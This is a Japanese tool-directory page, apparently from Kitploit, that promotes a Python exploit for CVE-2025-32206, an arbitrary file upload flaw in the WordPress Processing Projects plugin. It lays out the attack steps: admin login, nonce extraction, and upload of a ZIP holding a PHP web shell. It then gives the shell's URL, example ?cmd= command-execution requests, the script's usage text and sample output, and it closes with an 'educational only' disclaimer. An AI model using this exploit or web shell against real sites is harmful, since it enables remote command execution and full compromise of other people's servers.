Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-32206 — WordPress Processing Projects Plugin バージョン 1.0.2 以下は任意ファイルアップロードの脆弱性があります。 | Kitploit
ツール/GitHubGitHub/nxploited/cve-2025-32206
ペイロード生成脆弱性分析エクスプロイトシェルコードウェブアプリケーション悪用ペネトレーションテスト
GitHubnxploited/cve-2025-32206

CVE-2025-32206

WordPress Processing Projects Plugin バージョン 1.0.2 以下は任意ファイルアップロードの脆弱性があります。

リポジトリを見る
211年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-32206 - WordPress Processing Projects <= 1.0.2 任意ファイルアップロードエクスプロイト

CVE-2025-32206 Banner


🔍 CVE情報

  • CVE ID: CVE-2025-32206
  • 脆弱性タイプ: 無制限ファイルアップロード(Web Shellアップロード)
  • 影響を受けるプラグイン: Processing Projects WordPress Plugin
  • 影響を受けるバージョン: 不明 (n/a) から 1.0.2 まで
  • CVSSスコア: 9.1 (CRITICAL)
  • ベクター: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

「LABCAT Processing Projectsにおける危険なタイプのファイルの無制限アップロードの脆弱性により、攻撃者はWebサーバーにWebシェルをアップロードできます。これにより完全な侵害につながる可能性があります。」


🧑‍💻 エクスプロイトの説明

このPythonエクスプロイトスクリプトは、脆弱性のあるProcessing Projectsプラグイン(バージョン<=1.0.2)を使用しているWordPressサイトを対象としています。このプラグインは認証されたユーザーからのファイルアップロードを適切に処理せず、実行可能なPHPコード(Webシェル)を含む任意のZIPファイルをアップロードできるようにします。

エクスプロイトスクリプトの動作:

  1. 対象のWordPressサイトに管理者として認証します。
  2. 脆弱性のあるエンドポイントに移動し、nonceフィールドを自動抽出します。
  3. 悪意のあるPHPシェル(Nxploit.php)を含むZIPファイル(Nxploited.zip)を作成します。
  4. WordPress管理者の動作を模倣したPOSTリクエストでファイルをアップロードします。
  5. シェルが以下のURLでアクセス可能か確認します:
    • http://target.com/wp-content/uploads/processing-projects/Nxploit.php

🐚 シェルの使用方法

シェルが正常にアップロードされると、cmdパラメータを介してシステムコマンドを実行できます。例:

root@kitploit:~
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls

このシェルは任意のOSコマンドを実行し、その出力を直接レスポンスに返します。


🚀 使用法

root@kitploit:~
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD

Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)

options:
  -h, --help            show this help message and exit
  -u, --url URL         Target WordPress URL (e.g. http://target.com/wordpress)
  -un, --username USERNAME     WordPress admin username
  -p, --password PASSWORD      WordPress admin password

📄 サンプル出力

root@kitploit:~

[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi

[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php

⚠️ 免責事項

このスクリプトは教育目的のみで提供されています。所有していない、またはテストの明示的な許可がないシステムでこのエクスプロイトを無断使用することは違法かつ非倫理的です。

常に責任ある開示慣行に従い、このツールは管理された環境または明示的な許可がある場合にのみ使用してください。


By : Nxploited | Khaled Alenazi

ツールをダウンロード